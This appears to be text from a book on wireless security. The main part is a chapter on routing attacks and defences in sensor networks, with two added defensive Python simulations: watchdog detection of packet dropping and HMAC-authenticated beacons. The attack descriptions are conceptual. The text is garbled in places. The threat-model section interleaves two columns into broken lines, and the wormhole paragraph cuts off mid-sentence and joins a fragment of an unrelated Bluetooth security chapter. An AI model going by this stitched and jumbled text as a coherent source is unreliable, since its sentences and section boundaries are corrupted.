Section 5, "Routing Security Solutions and Techniques," explains the objectives to be met when developing a routing security solution. These security objectives are explained in the light of WSN constraints. Thus, the reader will be aware of the tradeoffs that should be considered in the design. A first step in the solution design is to decide whether the solution will prevent the attack or avoid it after detection. This section gives a comparison between these approaches based on the severity of the threats and the WSN conditions and resource availability. In this section, cryptographic-based and noncryptographic-based approaches will be discussed and the tradeoffs with resources will also be analyzed. Examples of such solutions will be provided with a focus on how these solutions meet secure routing goals and what drawbacks they exhibit. Reputation-based solutions will be discussed as a detection approach by presenting the general concept of reputation systems, followed by suggestions and approaches in reputation system solutions that can fit WSN secure routing requirements.

BACKGROUND

Wireless Sensor Network Overview

A WSN is an ad hoc-like deployment of a large number of sensor nodes that are intended to monitor and communicate information pertaining to a phenomenon or an event of interest. The deployment is either random or utilizes predetermined locations near or inside the phenomenon. The typical deployment scenario of a WSN is depicted in Figure 1, where a number of sensor nodes are scattered in the sensor field. The sensor nodes collect data from the field and route the data through the multihop structure of the network to a specialized node referred to as the sink or base station. Finally, the sink may communicate the raw data or a processed version to the end-user utilizing an infrastructure network such as the Internet.

Figure 1. Sensor nodes deployment in a sensor field. [Figure not reproduced; it shows the sensor nodes in the sensor field, the sink, the infrastructure network, and the user.]

Applications of WSN

Due to the versatility and flexibility of WSN, it has found many applications, especially in situations where direct probing or measurement of the event of interest is either costly or risky. WSNs facilitate many applications including:

• Military applications:
  ° Monitoring friendly forces, equipment, and ammunition
  ° Battlefield surveillance
  ° Reconnaissance of opposing forces and terrain
  ° Targeting guidance
  ° Battle damage assessment
  ° Nuclear, biological, and chemical (NBC) attack detection and reconnaissance
• Environmental and precision agriculture applications:
  ° Tracking the movements of birds, small animals, and insects
  ° Monitoring environmental conditions that affect irrigation
  ° Earth and environmental monitoring in marine, soil, and atmospheric contexts
  ° Forest fire detection
  ° Meteorological or geophysical research
  ° Flood detection
  ° Pollution study
  ° Fertilizer and humidity sensing for farms
• Health applications:
  ° Providing interfaces for the disabled
  ° Integrated patient monitoring
  ° Administration in hospitals
  ° Telemonitoring of human physiological data
  ° Tracking and monitoring doctors and patients inside a hospital
• Facility management and commercial applications:
  ° Managing inventory
  ° Monitoring product quality
  ° Robot control and guidance in automatic manufacturing environments
  ° Interactive museums
  ° Smart structures with sensor nodes embedded inside
  ° Vehicle tracking and detection
  ° Machine surveillance and preventive maintenance
  ° Intelligent buildings
• Telematics:
  ° Roads and traffic management

Sensor Node Structure

The basic structure of the sensor node is shown in Figure 2(a), while the protocol stack for the node is shown in Figure 2(b). The node contains an embedded system that performs the following main functions:

• Sensing: Every node should have the ability to observe and/or control the physical environment.
• Computing: The collected data from the physical environment through the sensing function are processed to produce beneficial information.
• Communication: Every node should be able to communicate and exchange raw data or processed information with the other nodes.

To accomplish the above tasks, the sensor node comprises four main components: the controller/memory module, the power supply module, the RF transceiver module, and the sensors/actuators module. In addition, the sensor unit may optionally contain two other modules, namely, the position finding module and the mobilizer module. While the former module is sometimes needed to determine the location of the node, the latter allows mobilizing the node to carry out certain tasks in the field of interest. A brief description of these modules of a sensor node is presented next.

Controller/memory module: The controller consists of a processor and a memory system. The processor manages the procedures that make the sensor node collaborate with the other nodes to carry out the assigned sensing tasks. The memory system stores data, software, and application programs required to run the node. Though higher computational power is being made available in smaller and smaller processors and controllers, the processing and memory units of sensor nodes are still scarce resources. For instance, the processing unit of a smart dust mote prototype is a 4 MHz Atmel AVR8535 micro-controller with 8 KB instruction flash memory, 512 bytes RAM, and 512 bytes EEPROM (Perrig, Szewczyk, Wen, Culler, & Tygar, 2001). The TinyOS operating system is used on this processor; it occupies 3500 bytes of code space and leaves 4500 bytes of code space available.

Power supply module: One of the most important components of a sensor node is the power unit. Since the sensor nodes are often inaccessible, power is considered a scarce resource and the lifetime of a sensor network depends on the lifetime of the power resources of the nodes. Power is also a scarce resource due to the size limitations. For instance, the total stored energy in a smart dust mote is of the order of 1 J (Pottie & Kaiser, 2000). It is possible to extend the lifetime of the sensor networks by energy scavenging, which means extracting energy from the environment. Solar cells are an example of the techniques used for energy scavenging.

Radio transceiver module: The radio transceiver unit is responsible for connecting the node to the network.

Figure 2. Wireless sensor network: (a) node structure, and (b) protocol stack. [Figure not reproduced. Panel (a) shows the controller, memory, ADC, RF transceiver, sensor/actuator, and power unit with power generator as typical modules, and the mobilizer and position finding system as optional modules. Panel (b) shows the physical, data link/MAC, network, transport, and application layers alongside the power management, mobility management, and task management planes.]

Sensors/actuators module: Sensing and actuator units are usually composed of sensors, actuators, and analog-to-digital (for sensing) and digital-to-analog (for actuating) converters (ADC/DAC). The analog signals produced by the sensors based on the observed phenomenon are converted to digital signals by the ADC and then fed into the processing unit or the controller. On the other hand, the digital signals produced by the controller are converted to analog signals by the DAC to feed the actuators.

Position finding module: In some instances, the operation of the sensor node, as in some of the routing techniques, requires knowledge of location with high accuracy. These nodes will be equipped with a module that is used to determine either the relative or the absolute location of the node. The absolute location can be obtained using the global positioning system (GPS), while the relative location can be calculated using the less expensive signal triangulation or multilateration techniques (Savvides, Han, & Srivastava, 2001).

Mobilizer module: For particular applications of WSN, it may be required to move a subset of the deployed sensor nodes into specific positions in the field of interest. For these nodes, the mobilizer module allows the node to move or change its location to perform the required task.

WSN vs. MANET

While WSN and mobile ad hoc networks share a lot of commonalities, there are distinct differences between the two technologies. These differences include the following characteristics.

Node population: Typically the number of nodes deployed in a WSN is orders of magnitude greater than the number of nodes in a MANET. This is of course a function of the application and the sensor field. In addition, wireless sensor nodes usually have a shorter communication range compared to their counterparts in MANET. This implies that the deployment density for sensor nodes may be significantly higher than that for the MANET.

Resource constraints: An obvious difference between MANET and WSN is resource constraints. Resources include power, memory, and processing capabilities. Although both networks suffer from resource deficiency, WSNs are more constrained and limited by such resources, especially in power. MANET nodes are typically laptops or handheld devices that have greater provisions in terms of power and processing capability, which is not the case for small sensor nodes. Any protocol design and implementation targeting WSN, from the physical to the application layer, must consider resource usage optimization not as an additional feature in the system but as a main design goal.

Communication and topology models: The most used communication model adopted for MANET is the point-to-point model. While this model is also applicable in WSN, other communication models such as broadcasting and multicasting are more realistic and representative of the intended applications. In addition, the topology for WSN is highly variable compared to that for MANETs. The loss of a sensor node due to a battery running out or destruction results in a topological change in the network to which the WSN has to respond and self-organize.

Application characteristics: WSN targets a great range of applications as mentioned in section 2.2. Therefore, WSN is expected to have different requirements in terms of node density, sensing functions, routing activity, and so forth compared to those for MANET. This variation also exists in MANET but to a lesser degree, as the number of applications for ad hoc networks is not as great as that for WSN.

Addressing and identification: WSN nodes usually do not possess a unique identification (ID), as opposed to an ad hoc node in a MANET where every node is identified by its media access control (MAC) address or its Internet address. Nodes within a sensor field organize and establish a mechanism to identify adjacent nodes and perform the required functionality.



ROUTING SECURITY

What is Routing Security

Routing is a fundamental operation in almost all types of networks because of the introduction of interdomain communication. Ensuring routing security is a necessary requirement to guarantee the success of the routing operation. When we talk about secure routing, we are concerned with security problems that may occur due to improper actions by an assumed router. These undesired actions can be related either to the router's identity or to the router's behavior. If the router has an undesirable identity or authorization, the router is considered an intruder who might perform serious attacks. Such attacks can be avoided by providing security services that validate the routers' identities. On the other hand, a router that misbehaves in the network by performing undesirable routing operations also contributes to the routing security problem. The attacks caused by misbehaving routers can be countered by mechanisms that validate and evaluate the router's behavior in the network.

Secure routing tasks get more challenging as the target network lacks an infrastructure-based routing operation. This infrastructure-less nature, which invites a multihop routing operation, is one of the main features of WSNs that raises the importance of the secure routing problem in these networks. Moreover, the risky environment, application criticality, and resource limitations and scarcity exhibited by WSNs make the task of secure routing much more challenging.

Why Routing Security is Important in WSN

Secure routing in WSN is important both for securing the obtained information and for protecting the network performance from degradation. Most WSN applications carry and deliver very critical and secret information, as in military and health applications. A WSN infected by malicious nodes can alter or inject incorrect information, misroute packets, analyze data, or fail to forward packets to their destination. Thus, having a secure routing protocol or framework can protect data exchange, secure information delivery, and maintain and protect the value of the communicated information.

Insecure routing can cause performance degradation as well. For example, nonforwarding attacks decrease the system throughput, since packets will be retransmitted many times and still not be delivered. Denial-of-service attacks can increase the packet delay, since some nodes acting as routers will be busy responding to the attack and forced to delay the processing of other packets. An infected WSN can be partitioned into different parts that cannot communicate with each other due to nonforwarding attacks. This leads to the demand of increasing the number of sensors or changing the node deployment to restore network connectivity. This is very expensive; however, it can be avoided if a good secure routing solution is adopted.

Network resources are also affected by insecure routing. For example, denial-of-service attacks affect resource availability, whether we consider an attacked node as a resource for routing or we consider the availability of the data itself. Also, this attack forces the attacked nodes to consume unnecessary energy on packet reception and processing.

As we can see, the information value and the network performance are directly affected by the security level of the routing operation in WSN. A secure routing solution, thus, should provide information protection and performance maintenance. However, any proposed solution should account for the overhead impact on the network performance. For example, a secure routing solution may introduce an overhead that decreases the network throughput. If this degradation is greater than the one resulting from the attack, it is better not to implement the solution in this regard.

ROUTING ATTACKS AND THREATS IN WSN

The design of a secure routing protocol becomes very essential, as the weaker defender (i.e., the sensor nodes) in the sensor network has the inherent disadvantages of insecure wireless communication, limited node capabilities, and possible insider threats, while the stronger attacker has the all-time advantage of possessing powerful laptops with high energy and long-range communication to launch severe attacks on the network. Most of the routing protocols have not been designed with security as a goal. All of the proposed network routing protocols in the literature are prone to attacks. Attackers can attract or repel traffic flows, increase latency, or disable the entire network, sometimes with little effort.

Considering the above modified model, the attacks can be categorized as passive and active attacks. In passive attacks, an eavesdropper can continuously monitor the whole sensor network and can launch two types of passive attacks: (i) a ciphertext-only attack, wherein, given the ciphertext, the adversary tries to recover the encryption key, and (ii) a chosen-plaintext attack, wherein the attacker can feed the sensor with known data and observe the encrypted message sent by the sensor. In active attacks, the attacker can capture a sensor, stealing all the information and keys stored
in the sensor. Hence, providing, maintaining, and
threat Models ensuringproperconfidentialityandauthenticit
data is a paramount importance within the limited
Inordertodefinearobustsecuritymodel, - specifica
inherent constraints of the underlying wireless
tion of both the security requirements and the threat sensor networks.
model are required. The security requirements Sensornetworkattackerscanbeclassifiedint
identify the properties that have to be enforced two categories depending upon their capabilities
and the initial assumptions. The threat model (Karlof & Wagner, 2003). They are mote-class
formulates the hypothesis regarding the attacker’s attacker and laptop-class attacker.
capabilities and its possible behavior. A common Mote-class attacker has access to a few ordinary
assumption is that the attacker is compliant with sensor nodes with lesser capability and might only
the Dolev-Yao threat model (Dolev & Yao, 1983) be able to jam the radio link in its immediate vicin-
which is often used to formally analyze crypto- ity. They have limited range and cannot eavesdrop
protocols in communication networks. According on entire network, moreover, cannot coordinate
to this model, when two communicating parties their efforts to bring down the network.
communicate over an insecure channel, the attacker Laptop-class attacker has access to more power-
can gain control over the communication network ful devices like laptops with greater battery power,
to perform the following actions: more capable processor, a high-power transmitter,
and a sensitive antenna. These attackers might be
• Over hear the messages between the parties, able to jam the entire network using a stronger
intercept them, and prevent their delivery to transmitter and might be able to eavesdrop on an
the intended recipient. entire network. Laptop-class attackers might pos-
• Introduce forged messages into the system sess a high bandwidth, low-latency communication
using all the available information. channel invisible to legitimate sensor nodes thereby
setting up separate channels to allow such attackers
But this threat model also assumes that the end to communicate and coordinate their efforts.
nodes are not themselves subject to attack. In order Further,sensornetworkattackscanbeclassifie
to take into account the distinguishing feature of as outsider (external) attacks and insider (internal)
WSNs that the sensors may be unattended and end attacks. Outsider attacks are launched by outsiders
nodes cannot, in general, be trusted, the following who have no special or legitimate access to the
more powerful action is required to be included sensor network, that is, they do not have authentic
in the model: keying material to participate in network operations
as legitimate nodes. Insider attacks occur when
• An attacker can capture a sensor node and an authorized participant in the sensor network
acquire all the information stored within it. has gone bad or compromised. The insider attack


may be mounted from either compromised sensor nodes running malicious code or attackers using laptop-class devices to attack the network after stealing the key material, code, and data from legitimate nodes. Outsider attackers, once in full control of certain nodes, can become insider ones able to launch more subtle attacks. Insider attacks are generally more difficult to defend against than the outsider ones because of their possession of keying material.

In most of the threat models proposed in the literature, it is assumed that the environments in which the sensors are deployed are risky and untrusted. Each sensor trusts itself, but sensors do not trust each other. Further, it is assumed that all the compromised sensors in the sensor network are compromised by the same attacker and thus collude to compromise the network. The attacker may compromise multiple sensor nodes in the network, and there is no upper bound on the number of compromised nodes. However, the attacker cannot compromise the base station, also termed the sink, which is typically resourceful and well protected. Once a sensor node is compromised, all the secret keys, data, and code stored on it are exposed to the attacker. The attacker can load a compromised node with secret keys obtained from other nodes, termed collusion among compromised nodes. In other words, the goal of the attacker is to uncover the keys used in the system in order to disrupt the network operation. In order to achieve this, the attacker compromises individual nodes and fosters collusion among nodes. The main objective of node collusion is to incrementally aggregate the uncovered keys of individual nodes to a level at which all encrypted traffic in the network is completely revealed. It is also assumed that the attacker cannot successfully compromise a node during the sensor deployment phase, which is short, that is, the interval of tens of seconds when each sensor bootstraps itself, during which the sensor nodes obtain their location information and derive a few keys. Indeed, such attacks can be prevented in many real-life scenarios when appropriate network planning and deployment are carried out to keep attackers away during the bootstrapping process. However, it should be noted that stronger threat (attacker) models need to be applied when we consider tactical military network deployment for war-field surveillance, whereas for noncritical commodity sensor networks a less strong threat model may suffice.

A new threat model for communication confidentiality in WSNs, termed the "smart attacker model," is introduced by Di Pietro, Mancini, and Mei (2006). All the random-key predeployment schemes (see section 5 for a detailed discussion) proposed in the literature use an oblivious attacker model, in which at each step of the attack sequence the attacker randomly chooses a sensor node to tamper with, without taking advantage of the information regarding the keys acquired during the previous attacks. Contrary to this, the smart attacker model greedily uses the information about the keys acquired in previous attacks to choose the best sensor to tamper with in order to compromise the communication confidentiality. This greatly reduces the level of communication confidentiality provided by all the random key predeployment schemes.

Routing Attacks and Examples

Any event that decreases or eliminates a network's capacity to perform its expected function is termed a denial-of-service attack, commonly known as a DoS attack (Wood & Stankovic, 2002). Some of the major causes of DoS attacks are hardware failures, software bugs, resource exhaustion, malicious attacks, and environmental conditions. A significant challenge in securing large sensor networks is their inherent self-organizing, decentralized nature. Many of the network deployments are vulnerable to immensely more powerful attackers.

Considering the layered network architecture of sensor networks depicted in Figure 2(b), the DoS vulnerabilities of the first four layers of the stack can be identified (Wood & Stankovic, 2002) as:

• Physical layer attacks: The most common attacks on the physical layer of a WSN are jamming and node physical tampering.
• Data link layer attacks: Collisions, unfairness, or exhaustion of resources are the attacks that can be launched against the data link layer of a sensor network.

• Network layer attacks: The possible routing layer attacks are routing information spoofing, alteration or replay, blackhole and selective forwarding attacks, sinkhole attacks, Sybil attacks, wormhole attacks, HELLO flood attacks, and acknowledgement spoofing.
• Transport layer attacks: The most common attacks on the transport layer are flooding attacks and desynchronization attacks.

Since our main focus in this chapter is routing security, a detailed discussion of network layer or routing attacks will be presented next. Sensor network routing attacks can be classified into the following categories (Karlof & Wagner, 2003):

• Routing information spoofing, alteration, or replay
• Blackhole and selective forwarding attacks
• Sinkhole attacks
• Sybil attacks
• Wormhole attacks
• HELLO flood attacks
• Acknowledgement spoofing

Routing information spoofing, alteration, or replay: Targeting the routing information exchanged between the nodes is the most direct attack against a routing protocol. By spoofing, altering, or replaying routing information, an attacker can disrupt the network by creating routing loops, attracting or repelling network traffic, extending or shortening source routes, generating false error messages, partitioning the network, or increasing the end-to-end latency.

Most of the sensor network routing protocols, such as TinyOS beaconing, directed diffusion and its multipath variant, geographic routing (e.g., GPSR, geographic and energy aware routing [GEAR]), minimum cost forwarding, rumor routing, and energy conserving and topology maintenance protocols (e.g., SPAN, GAF, CEC, AFECA), are prone to bogus routing information attacks. For example, since routing updates are not authenticated in the TinyOS beaconing protocol, it is possible for any malicious node to claim to be a base station and become the destination of all traffic in the network. A mote-class attacker can very easily create routing loops by spoofing routing updates. In GPSR, an adversary can forge location advertisements to create routing loops in data flows without having to actively participate in packet forwarding.

Black hole and selective forwarding attacks: Multihop networks basically work on the assumption that nodes will participate faithfully in the forwarding of the received messages. In a blackhole attack, a malicious node refuses to forward every packet it receives, thereby behaving like a black hole. In a selective forwarding attack, a malicious node selectively forwards the packets, that is, a malicious node may refuse to forward certain messages and simply drop them, thereby ensuring that these packets are not propagated any further. A malicious node interested in suppressing or modifying the packets originating from a few selected nodes can reliably forward the remaining traffic, thereby limiting the suspicion of its misbehavior. In order to launch a selective forwarding attack effectively, the attacker must follow the path of least resistance and attempt to explicitly include itself on the actual path of the data flow.

Most of the sensor network routing protocols, such as TinyOS beaconing, directed diffusion and its multipath variant, geographic routing (e.g., GPSR, GEAR), minimum cost forwarding, clustering-based protocols (e.g., LEACH, TEEN, PEGASIS), and rumor routing, are highly prone to selective forwarding attacks. For example, in the LEACH protocol, nodes choose a cluster-head based on received signal strength. A laptop-class attacker can take advantage of this to send a powerful advertisement to all nodes in the network in order to mount a selective forwarding attack on the entire network using a small number of nodes, if the target number of cluster-heads or the size of the network is sufficiently small.
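To make the forwarding misbehavior described above concrete from the defender's side, the following added example (not code from the chapter) simulates a small linear multihop network in which one relay silently drops packets, and applies a neighbor-monitoring check: each node counts the packets it hands to its next hop and the ones it overhears that next hop retransmit, and flags any relay whose forwarding ratio falls below a threshold. The topology, the drop probability and the 0.8 threshold are constructed values, and the monitoring itself is a watchdog-style technique that the chapter does not discuss.

```python
"""Watchdog-style detection of blackhole and selective forwarding in a toy
multihop sensor network.  Added example for this chapter, not the authors'
code.  Topology, drop probability and the 0.8 alert threshold are constructed."""
import random
from collections import defaultdict


def build_next_hops(n_nodes):
    """Constructed linear topology: node i forwards to i-1; node 0 is the base station."""
    return {i: i - 1 for i in range(1, n_nodes)}


class Watchdog:
    """Every node counts the packets it hands to a next hop and how many of
    those it later overhears that next hop retransmit.  A forwarding ratio
    below the threshold marks the next hop as a suspected dropper."""

    def __init__(self, threshold=0.8):
        self.threshold = threshold
        self.handed = defaultdict(int)     # (observer, next_hop) -> packets handed over
        self.forwarded = defaultdict(int)  # (observer, next_hop) -> packets seen forwarded

    def record(self, observer, next_hop, was_forwarded):
        self.handed[(observer, next_hop)] += 1
        if was_forwarded:
            self.forwarded[(observer, next_hop)] += 1

    def ratio(self, observer, next_hop):
        handed = self.handed[(observer, next_hop)]
        return self.forwarded[(observer, next_hop)] / handed if handed else 1.0

    def suspects(self):
        """Node ids flagged by at least one upstream observer."""
        return sorted({nh for (obs, nh) in self.handed
                       if self.ratio(obs, nh) < self.threshold})


def simulate(n_nodes, malicious, drop_rate, packets_per_source, seed=1):
    """Each node other than the base station originates packets_per_source
    packets.  Nodes in `malicious` drop each packet they should relay with
    probability drop_rate (1.0 models a blackhole, less than 1.0 selective
    forwarding).  Returns (delivered, total, watchdog)."""
    rng = random.Random(seed)
    next_hop = build_next_hops(n_nodes)
    watchdog = Watchdog()
    delivered = total = 0
    for source in range(1, n_nodes):
        for _ in range(packets_per_source):
            total += 1
            current = source
            while True:
                nh = next_hop[current]
                if nh == 0:                # the base station is the final recipient
                    delivered += 1
                    break
                # Does the relay retransmit?  The handing node overhears the answer.
                forwarded = not (nh in malicious and rng.random() < drop_rate)
                watchdog.record(current, nh, forwarded)
                if not forwarded:
                    break                  # packet silently dropped at nh
                current = nh
    return delivered, total, watchdog


def delivery_ratio(delivered, total):
    return delivered / total if total else 0.0


if __name__ == "__main__":
    for label, bad, rate in (("honest", set(), 0.0),
                             ("selective forwarding", {3}, 0.5),
                             ("blackhole", {3}, 1.0)):
        d, t, wd = simulate(6, bad, rate, 200)
        print(f"{label:22s} delivered {d}/{t}  suspects {wd.suspects()}")
```

Running it shows that a pure blackhole is flagged at once, while a 50% selective forwarder still drops half of the traffic passing through it and is flagged because its upstream neighbor measures a ratio near 0.5. The check only sees the relay one hop away, so an attacker that reliably forwards most traffic and drops only a few chosen sources, exactly the behavior the chapter warns about, stays below suspicion unless the threshold is tightened or counts are kept per source.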


Sinkhole attacks: In a sinkhole attack, the goal of the attacker is to attract nearly all the traffic from a particular region through a compromised node, thereby creating a metaphorical sinkhole with the attacker at the center. Sinkhole attacks typically work by making a compromised node appear especially attractive to surrounding nodes with respect to the routing algorithm.

Most of the sensor network routing protocols, such as TinyOS beaconing, directed diffusion and its multipath variant, minimum cost forwarding, and rumor routing, are prone to sinkhole attacks. For example, a laptop-class attacker with a powerful transmitter can actually provide a high quality route by transmitting with enough power to reach the base station in a single hop. Because of this high quality route through the compromised node, each neighboring node of the adversary will forward packets destined for a base station through the adversary and also propagate the attractiveness of the route to its neighbors. Due to the specialized communication pattern used, hierarchical sensor networks are highly susceptible to sinkhole attacks. In hierarchical sensor networks, all packets share the same ultimate destination, that is, a base station; a compromised node is required only to provide a single high quality route to the base station in order to attract a potentially large number of nodes.
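The sinkhole and bogus-routing-information examples above rest on the fact that routing beacons are not authenticated. The following added example (not code from the chapter) contrasts an unauthenticated TinyOS-style beacon exchange with one in which every beacon carries a truncated HMAC under a network-wide key together with a per-sender sequence number. The beacon layout, the key and the four-node topology are constructed for the demonstration.

```python
"""Authenticated, replay-protected routing beacons versus the unauthenticated
beaconing the chapter describes.  Added example for this chapter, not the
authors' code.  The beacon layout, the network-wide key and the four-node
topology are constructed for the demonstration."""
import hmac
import hashlib
import struct

NETWORK_KEY = b"constructed-demo-network-key"   # shared by all legitimate nodes (assumption)
BODY_FMT = ">HBI"                               # node_id (2 bytes), hop_count (1), seq (4)
BODY_LEN = struct.calcsize(BODY_FMT)
TAG_LEN = 8                                     # truncated HMAC-SHA256 tag


def make_beacon(key, node_id, hop_count, seq):
    """Beacon = body || HMAC-SHA256(key, body)[:8]."""
    body = struct.pack(BODY_FMT, node_id, hop_count, seq)
    tag = hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]
    return body + tag


def verify_beacon(key, beacon, last_seq):
    """Return (node_id, hop_count, seq) if the tag is valid and seq is newer
    than the last one accepted from that sender; otherwise None.  last_seq is
    the receiver's per-sender replay window and is updated on success."""
    if len(beacon) != BODY_LEN + TAG_LEN:
        return None
    body, tag = beacon[:BODY_LEN], beacon[BODY_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expected):
        return None                      # forged or altered beacon
    node_id, hop_count, seq = struct.unpack(BODY_FMT, body)
    if seq <= last_seq.get(node_id, -1):
        return None                      # replayed beacon
    last_seq[node_id] = seq
    return node_id, hop_count, seq


class SensorNode:
    """Keeps a parent toward the base station; adopts any neighbor that
    advertises a strictly shorter hop count (TinyOS-style beaconing)."""

    def __init__(self, node_id, authenticate):
        self.node_id = node_id
        self.authenticate = authenticate
        self.hop_count = None
        self.parent = None
        self.last_seq = {}

    def receive(self, beacon, key):
        """Process one beacon; return True if it passed validation."""
        if self.authenticate:
            parsed = verify_beacon(key, beacon, self.last_seq)
            if parsed is None:
                return False
        else:
            parsed = struct.unpack(BODY_FMT, beacon[:BODY_LEN])  # tag ignored
        sender, hop_count, _ = parsed
        if self.hop_count is None or hop_count + 1 < self.hop_count:
            self.hop_count, self.parent = hop_count + 1, sender
        return True


def run(authenticate):
    """Build the routing tree legitimately, then let an outsider (id 99, no
    key) advertise hop count 0 to every node.  Returns ({node: parent},
    number of nodes that accepted the outsider's beacon)."""
    hears = {0: (1, 2), 1: (3,), 2: (4,)}        # constructed topology: who hears whom
    nodes = {i: SensorNode(i, authenticate) for i in (1, 2, 3, 4)}
    base_beacon = make_beacon(NETWORK_KEY, 0, 0, seq=1)
    for n in hears[0]:
        nodes[n].receive(base_beacon, NETWORK_KEY)
    for relay in (1, 2):                          # relays re-beacon their own hop count
        beacon = make_beacon(NETWORK_KEY, relay, nodes[relay].hop_count, seq=1)
        for n in hears[relay]:
            nodes[n].receive(beacon, NETWORK_KEY)
    forged = struct.pack(BODY_FMT, 99, 0, 1) + bytes(TAG_LEN)  # outsider guesses a tag
    accepted = sum(nodes[n].receive(forged, NETWORK_KEY) for n in nodes)
    return {n: nodes[n].parent for n in nodes}, accepted


if __name__ == "__main__":
    print("unauthenticated:", run(False))   # nodes 3 and 4 now route via 99
    print("authenticated:  ", run(True))    # tree unchanged, forged beacon rejected
```

In the unauthenticated run a single "hop count 0" beacon from the outsider pulls nodes 3 and 4 onto it; in the authenticated run the same beacon is rejected, and a replay of a genuine beacon is dropped by the sequence check. The check stops outsiders only: a compromised node or a laptop-class attacker holding stolen keying material produces valid tags, which is exactly why the chapter treats insider attacks as the harder ones to defend against.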

Wormhole attacks: In the wormhole attack, an attacker tunnels messages received in one region of the network over a low-latency link and replays them in a different region. Wormhole attacks more commonly involve two distant malicious nodes colluding to understate their distance from each other by relaying packets along an out-of-bound

Evaluating Security Mechanisms in Different Protocol Layers for Bluetooth Connections

quadruple in number between now and 2008, from under 100 million to about 440 million. Bluetooth enabled devices are used in several different environments and cover a wide range of applications. For instance, for mobile applications, the device periodically connects to the network to download music, to transfer files, or to synchronize with one's desktop on calendar and other files. Consequently, the safety and security of these applications, for instance the security of the private information stored on the devices, becomes a major issue. By attacking the communication link actively or passively, aggressors could obtain personal and also important business data. However, security features (Gehrmann, Persson, & Smeets, 2004) must be carefully considered and analyzed in order to decide whether Bluetooth technology indeed provides the right answer for any particular task or application.

The Bluetooth standard has long been criticized for various vulnerabilities and security inefficiencies, as its designers are trying to balance between performance and complementary services including security. So far, both the Bluetooth Special Interest Group (SIG) (Bluetooth SIG, 2003) and several researchers have made significant contributions on Bluetooth security aspects, discovering numerous vulnerabilities and potential weaknesses and proposing solutions (Adam, 2003; Gehrmann & Nyberg, 2002; Jacobson & Wetzel, 2001; Persson & Manivannan, 2003; Shaked & Wool, 2005). For example, the Bluetooth pairing procedure has been anticipated to be weak under certain circumstances. Moreover, other categories of threats, either active or passive, have also been investigated, including ad hoc security issues, malicious software like "Cabir," war-nibbling, and so forth.

An obvious choice for any Bluetooth application would be to use the Bluetooth encryption provided at the link layer. Virtually all Bluetooth devices support this feature, and it is, in most cases, considered to be adequately secure. However, this may not be applicable for all deployment scenarios. In order to establish a secure channel with another Bluetooth device, a preshared secret called the PIN is required. A symmetric key is generated from this PIN. On customer devices this PIN typically consists of four or five digits. Supposing a whole piconet would utilize this PIN to encrypt its communication, anyone acquiring this PIN could theoretically decrypt all communication. On top of that, in applications like VoIP that mandate IP connectivity to access points (APs), the encryption would end at the AP, which means that the AP, or any host that can manipulate the communication between the mobile device and the other end, can expose the data (see Figure 1). Thus, it is obvious that Bluetooth encryption is not well suited for all applications which may exploit Bluetooth connections.

Under these circumstances and for certain classes of security sensitive applications deployed in Bluetooth PAN networks, the investigation of complementary and advanced security protocols apart from Bluetooth's native security mechanisms, even if deployed as an interim countermeasure, is an interesting research issue. On the other hand, as Bluetooth wireless technology is targeting devices with particular needs and constraints (e.g., processing power and battery consumption), the trade-offs between security services and performance must be carefully considered. Furthermore, considering that radio links in general suffer from limited bandwidth and are unreliable by nature, performance issues must be thoroughly investigated in order to decide whether certain security protocols and their mechanisms are advantageous over Bluetooth connections, delivering robust and agile security services within tolerable service response times.

Figure 1. Sample scenario that mandates upper layer security



During the last few years, several researchers have examined various Bluetooth security parameters and some of them do explore performance parameters (e.g., Chakraborty, 2000; De Morais Cordeiro, Sadok, & Agrawal, 2001; Francia, Kilaru, Le Phuong, & Vashi, 2004; Golmie & Rebala, 2003; Howitt, 2002; Karnik & Kumar, 2000; Kitsos et al., 2003; Lim et al., 2001; Miorandi, Caimi, & Zanella, 2003; Wang, Arumugam, & Krishna, 2002). However, to the best of our knowledge, none of these works focus on performance evaluation comparing Bluetooth's native security mechanisms with well-respected, strong security protocols like IPsec and SSH.

The chapter will focus on the performance of existing protocols and mechanisms rather than on security itself, estimating the performance of both the built-in Bluetooth security mechanisms, namely the security modes, and two other standard security protocols operating at different layers of the TCP/IP protocol suite, namely SSH and IPsec. Protocols like SSH and IPsec provide robust, flexible, costless, and easy to implement solutions for exchanging data over insecure communication links. However, although their deployment is a well established and accustomed practice in the wireline world, more research effort is needed for wireless links, due to the several aforementioned limitations. Depending on the scenario involved, the user may utilize SSH or IPsec security services, either individually or in combination with Bluetooth security modes, allowing applications to communicate securely by constructing a secure tunnel. Thus, in a sense, the whole procedure can also be seen as the deployment of small VPNs in Bluetooth PANs. Note, however, that the efficiency of SSH and IPsec depends mainly on the performance of the end-system used. On the contrary, the native Bluetooth security modes utilize the hardware encryption of the Bluetooth chip, thus performance depends heavily on the chip per se. This situation will allow us to make several observations about different layer security mechanisms when deployed over dissimilar user devices.

Specifically, the chapter will evaluate several personal area network (PAN) parameters, including transfer times, link capacity, and throughput. Experiments shall employ both Bluetooth native security mechanisms as well as the two aforementioned protocols. Through a plethora of scenarios, utilizing both laptops and palmtops, we intend to offer a comprehensive in-depth comparative analysis of each of the aforementioned security mechanisms when deployed over Bluetooth communication links.

The rest of the chapter is structured as follows. The next section gives an overview of our experimental test-bed related parameters and procedures, while the third section presents the derived performance measurement results. The fourth section offers an analytical discussion of the conducted results. The chapter finishes with some concluding thoughts and future directions of this work.

Experimental Framework Description

The experimental topology consists of two pairs of machines. The first pair of Bluetooth devices employs a laptop and a palmtop machine, while the other consists of two similar laptop machines. The members of each pair are located 10 meters apart and connected via Bluetooth adapters (or a built-in Bluetooth chip), thus forming a small two-member wireless PAN (WPAN) or piconet. The main components' characteristics, both software and hardware, are presented in Table 1. To estimate the performance of the Bluetooth network, the data were transmitted from one network node (server) to the other (client). Hence, in order to record the incoming and outgoing packets between the corresponding network entities and to calculate the network performance parameters, we utilized on the server side the well known network analyzer "ethereal" (www.ethereal.com), version 0.10.12, which in turn uses the "tcpdump" tool. In addition, for the Linux environment, we employed the BlueZ official Linux Bluetooth protocol stack (www.bluez.org), which provides support for the core Bluetooth layers and protocols.

Bluetooth supports three different security modes called security modes I, II, and III, but in



